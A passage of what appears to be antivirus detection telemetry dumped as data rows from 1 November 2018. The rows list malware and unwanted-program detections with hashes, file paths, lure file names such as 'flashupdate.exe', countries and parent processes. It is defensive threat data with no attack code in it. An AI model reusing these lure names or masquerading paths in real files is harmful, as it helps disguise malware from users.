  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:26:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4978a9920b1dc099dbee7aeeb8578a279d70946aafe86abeee017959f2a0ca10', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\4978A9920B1DC099DBEE7AEEB8578A279D70946AAFE86ABEEE017959F2A0CA10', filesize=168000, name='WORM/Soltern.oald.#M1.#R1'), hash='4978a9920b1dc099dbee7aeeb8578a279d70946aafe86abeee017959f2a0ca10', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:03:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000079ce', filepath='C:\\Windows\\Temp\\c8a8db62-6e13-477e-b972-5a3522bb3be9\\tmp00000371\\tmp000079ce', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='49bbab85a2e8d32e23827bada887e2f38157dcb2847ef4ecf4c11d999aec4d0a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.15.1046.10613\\AdAwareService.exe', parentsize=630976, timestamp='2018-11-01T16:05:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r78xhjm', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R78XHJM', filesize=64000, name='VBA/Dldr.Agent.nwhnf.#M1.#R1'), hash='4a49ca27de47c4b04faa416e2d8d64bc1a4ed73782e75d527c1ad2bfe9980e7d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184221-a53e7c9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184221-A53E7C9F', filesize=64000, name='VBA/Dldr.Agent.nwhnf.#M1.#R1'), hash='4a49ca27de47c4b04faa416e2d8d64bc1a4ed73782e75d527c1ad2bfe9980e7d', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sysprep.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\sv_daily.1\\Software\\OLD\\HP - Simulator\\Training Simulator\\18406- LAB Files\\ClassFiles\\Sysprep\\sysprep.exe', filesize=192000, name='W32/Sality.Y.#M1.#R1'), hash='4a964ebc488535678b61481ca220853d38ebc8ebceed96133d900cb0c73f75aa', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T11:49:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sysprep.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\hourly.0\\Software\\OLD\\HP - Simulator\\Training Simulator\\18406- LAB Files\\ClassFiles\\Sysprep\\sysprep.exe', filesize=192000, name='W32/Sality.Y.#M1.#R1'), hash='4a964ebc488535678b61481ca220853d38ebc8ebceed96133d900cb0c73f75aa', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T09:43:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sysprep.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\nightly.0\\Software\\OLD\\HP - Simulator\\Training Simulator\\18406- LAB Files\\ClassFiles\\Sysprep\\sysprep.exe', filesize=192000, name='W32/Sality.Y.#M1.#R1'), hash='4a964ebc488535678b61481ca220853d38ebc8ebceed96133d900cb0c73f75aa', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T08:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='D:\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4ab7f3881951699503ec3d0c4a6c245469963cc591ea704d75fce1ec3a564c9e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T05:44:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\ka-GE\\S-1-4-46\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\ka-GE\\S-1-4-46\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\MUI\\S-1-5-86\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\MUI\\S-1-5-86\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:01:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mymediadownloader.exe', filepath='E:\\Pendrive\\desktop back up 21.10.2014\\Downloads\\MyMediaDownloader.exe', filesize=592000, name='PUA/Bundlore.#M1.#R1'), hash='4b32bddf9d147dc3701c3827306924aaadf551848e256c4151bba809beb094fc', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:00:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:00:06Z'), dt=datetime.date(2018, 11, 1)),
  ...],
 [Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092521-bd13ff30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_568d7c96\\AVSCAN-20181101-092405-B51E7683\\AVSCAN-20181101-092521-BD13FF30', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134508-9edc7a70', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134353-521A0B3E\\AVSCAN-20181101-134508-9EDC7A70', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222832-571b0f7c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222747-E684C720\\AVSCAN-20181101-222832-571B0F7C', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-024914-9abac164', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d265d3ba\\AVSCAN-20181102-024828-93CDD881\\AVSCAN-20181102-024914-9ABAC164', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-024911-9a4a5f88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d265d3ba\\AVSCAN-20181102-024828-93CDD881\\AVSCAN-20181102-024911-9A4A5F88', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Documents and Settings\\X\\My Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105215-2fe43325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_597256d4\\AVSCAN-20181101-104821-1B7B9DD1\\AVSCAN-20181101-105215-2FE43325', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unconfirmed 108949.crdownload', filepath='C:\\Users\\X\\Downloads\\Unconfirmed 108949.crdownload', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='\\\\\\/Run \\\\\\/TN \\\\\\"Avira_Antivirus_Systray\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\schtasks.exe', parentsize=179712, timestamp='2018-11-01T15:29:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215553-7fc1ef47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae9b16be\\AVSCAN-20181101-215525-7B265514\\AVSCAN-20181101-215553-7FC1EF47', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:54:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dc2029.exe', filepath='C:\\RECYCLER\\S-1-5-21-602162358-57989841-1417001333-1003\\Dc2029.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:46:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\Dokumentumok\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:57:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kh pha an.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\KH pha an.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='5441907fe28239a849ec4ccd4a35949ef1045b30179a383300e62c9779c5c352', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161647-f481f999', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161647-F481F999', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='5441907fe28239a849ec4ccd4a35949ef1045b30179a383300e62c9779c5c352', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='D:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='544dde8c316c6602a65d70e5a767b16442ceb187595c91b4ebf191ae096abd45', metadata=Row(cmdline='\\\\\\/prefetch:1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files\\Windows Media Player\\wmplayer.exe', parentsize=192000, timestamp='2018-11-01T22:20:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\D:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='544dde8c316c6602a65d70e5a767b16442ceb187595c91b4ebf191ae096abd45', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:20:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\D:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='544dde8c316c6602a65d70e5a767b16442ceb187595c91b4ebf191ae096abd45', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='546a2c8ffb305c22ea689d0d1bc9cc10f5c179e07f4ee703931e41939439c746', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\546A2C8FFB305C22EA689D0D1BC9CC10F5C179E07F4EE703931E41939439C746', filesize=188000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='546a2c8ffb305c22ea689d0d1bc9cc10f5c179e07f4ee703931e41939439c746', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:28:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5487c98b79e9f77bf6e6b888928da0d0051b2b9b6e581906705025417ecb86d5.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\5487C98B79E9F77BF6E6B888928DA0D0051B2B9B6E581906705025417ECB86D5.VIR', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='5487c98b79e9f77bf6e6b888928da0d0051b2b9b6e581906705025417ecb86d5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:12:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ml_downloads.dll', filepath='C:\\Program Files (x86)\\Winamp\\Plugins\\ml_downloads.dll', filesize=300000, name='W32/Ramnit.C.#M1.#R1'), hash='54ec09487b15d56a42e9f86db8dd74e6503ff11e6be761779946e525c9a59fe8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:A\\\\\\/l5xIFMIEKLNt+w.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:18:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='550ba13a1caba754a42bc04ccad5aeccb584a2ccf3bbef8ac2b5e5da367bb998', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\550BA13A1CABA754A42BC04CCAD5AECCB584A2CCF3BBEF8AC2B5E5DA367BB998', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='550ba13a1caba754a42bc04ccad5aeccb584a2ccf3bbef8ac2b5e5da367bb998', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f_000361', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000361', filesize=280000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='551122d9c5eb30aa0eee374362ea6336e093854a0efc1be403447b1fc5bf9b8d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T13:07:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0155039.dll', filepath='g:\\system volume information\\_restore{98857453-17a4-42b1-8085-e71e507860ed}\\rp81\\A0155039.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:22:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0155595.dll', filepath='g:\\system volume information\\_restore{98857453-17a4-42b1-8085-e71e507860ed}\\rp82\\A0155595.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:25:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0053987.dll', filepath='g:\\system volume information\\_restore{6428f543-31d7-4f50-a73d-00430e005dd2}\\rp43\\A0053987.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:20:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5558c69b38c90e15bf8c5593bf113e0a026e41c563e379ef55af9d29cebd4431', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\5558C69B38C90E15BF8C5593BF113E0A026E41C563E379EF55AF9D29CEBD4431', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5558c69b38c90e15bf8c5593bf113e0a026e41c563e379ef55af9d29cebd4431', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deep voyage.exe', filepath='\\?\\J:\\العاب2\\Deep Voyage\\Deep Voyage.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='555ad99c4b9ad6dd72f0449f9fe2c78d6142d25ca3e7d644604769e111ce98da', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142940-f9608286', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142940-F9608286', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='docs.scr', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Docs\\Docs.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cyberlink.exe', filepath='C:\\Users\\X\\CyberLink\\CyberLink.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142514-d22ac7d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142514-D22AC7D8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142201-b5c283e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142201-B5C283E6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:01Z'), dt=datetime.date(2018, 11, 1)),
